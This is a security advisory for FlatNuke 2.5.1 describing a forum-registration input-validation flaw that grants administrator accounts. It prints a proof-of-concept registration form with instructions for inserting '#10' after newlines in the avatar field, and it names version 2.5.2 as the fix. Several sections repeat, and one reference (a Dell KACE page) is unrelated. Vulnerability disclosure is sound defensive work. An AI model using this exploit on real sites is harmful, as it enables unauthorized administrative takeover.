FlatNuke Form Submission Input Validation Vulnerability
BID:12150
Info
FlatNuke Form Submission Input Validation Vulnerability
| Bugtraq ID: | 12150 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 03 2005 12:00AM |
| Updated: | Jan 03 2005 12:00AM |
| Credit: | Discovery is credited to Pierquinto Manco <[email protected]>. |
| Vulnerable: |
FlatNuke FlatNuke 2.5.1 |
| Not Vulnerable: |
FlatNuke FlatNuke 2.5.2 |
Discussion
FlatNuke Form Submission Input Validation Vulnerability
FlatNuke is prone to an input validation vulnerability that could allow a remote user to create an administrator account on the site or inject arbitrary script code. This issue exists in the forum registration process.
FlatNuke 2.5.1 was reported to be vulnerable to this issue, however, earlier versions may also be affected.
FlatNuke is prone to an input validation vulnerability that could allow a remote user to create an administrator account on the site or inject arbitrary script code. This issue exists in the forum registration process.
FlatNuke 2.5.1 was reported to be vulnerable to this issue, however, earlier versions may also be affected.
Exploit / POC
FlatNuke Form Submission Input Validation Vulnerability
The following example submission form was provided:
<form action="http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://"><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature: <textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Open the form in a Web browser and enter information in all fields. In the url_avatar field, press Enter at least twice and insert the text "#10" without quotes. Submitting this form will cause the account to be created as an administrator account.
The following example submission form was provided:
<form action="http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://"><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature: <textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Open the form in a Web browser and enter information in all fields. In the url_avatar field, press Enter at least twice and insert the text "#10" without quotes. Submitting this form will cause the account to be created as an administrator account.
Solution / Fix
FlatNuke Form Submission Input Validation Vulnerability
Solution:
This issue has been addressed in FlatNuke 2.5.2:
FlatNuke FlatNuke 2.5.1
Solution:
This issue has been addressed in FlatNuke 2.5.2:
FlatNuke FlatNuke 2.5.1
-
FlatNuke flatnuke-2.5.2.tar.gz
http://prdownloads.sourceforge.net/flatnuke/flatnuke-2.5.2.tar.gz?down load
References
FlatNuke Form Submission Input Validation Vulnerability
References:
References:
- Dell KACE K1000 Systems Management Appliance Homepage (DELL)
- Multiple Vulnerabilities in FlatNuke (Pierquinto Manco
)